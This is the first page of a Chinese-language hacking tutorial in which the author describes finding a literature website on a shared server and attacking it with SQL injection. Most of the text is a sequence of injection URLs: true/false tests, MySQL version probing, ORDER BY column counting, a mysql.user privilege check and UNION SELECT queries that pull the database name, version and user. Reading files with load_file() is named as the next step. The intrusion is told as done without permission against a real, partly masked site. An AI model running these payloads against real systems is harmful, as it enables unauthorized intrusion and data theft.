注意:转载此篇文章请保留原作者的信息!
[作者]:草哲
[博客]:http://www.337479.cn
[联系]:QQ 337479
各位同学大家好,我是草哲,好久没写教程了,最近一直在弄我的博客(打个广告先别走开哦),欢迎大家来我的BLOG做客!地址是http://www.337479.cn!
前些日子在家无聊,去了一些视频站看看搞笑的视频啥的,听说偶偶娱乐那个站还不错,但是打开来卡的要命,视频半天也不动,郁闷!偶然间不知道点进了哪个连接,进入了一个219.238.xxx.xxx这个地址,FLASH做的还不错,呵呵!
于是到http://www.myipneighbors.com/这个站点查看一下该主机绑定了哪些域名!
这服务器上有3个站点,看看第一个xx.ouou.com吧!进去一看是一个文学站点,这速度感觉还不错,可我对文学不感兴趣,因为我只有幼本(幼儿园本科)的学历!网站程序是PHP的,习惯性的点进一个连接http://xx.ouou.com/booklook.php?id=28进去检测以下是否存在
注入漏洞!提交
http://xx.ouou.com/booklook.php?id=28 and 1=1
http://xx.ouou.com/booklook.php?id=28 and 1=2
返回了不同的页面,可以肯定的是存在注入漏洞!
检测一下mysql的版本,返回正常可以进行union查询!
http://xx.ouou.com/booklook.php?id=28 and ord(mid(version(),1,1))>51 /*
用order by检测一下数据库的字段好进行下一步的渗透!
http://xx.ouou.com/booklook.php?id=28 order by 5 直接爆出路径了,呵呵~!看来应该经典的LMAP组合了~!(linux+mysql+apache+php)
最后得出共25个字段http://xx. uou.com/booklook.php?id=28 order by 25
字段数知道了,下面来进一步进行渗透。。。哦,对了,我们先看看这个数据库的账户有没有写的权限,如果没有我们就无法load_file()来读取文件了!可以看页面返回的结果来判断,返回正常页面说明有写的权限,呵呵。
http://xx.ouou.com/booklook.php?id=28 and (select count(*) from mysql.user)>0 /*
返回正常,我们进行下一步的渗透!上面说了,字段数已经确定是25了,好了我们来构造注入语句!
http://xx.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
返回页面如下图
检测一下具体的,数据库连接账户,数据名和数据库版本
http://xx.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201,2,database(),4,version(),6,7,user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
1 2 下一页
安全中国首页 > 文章中心 > 入侵技术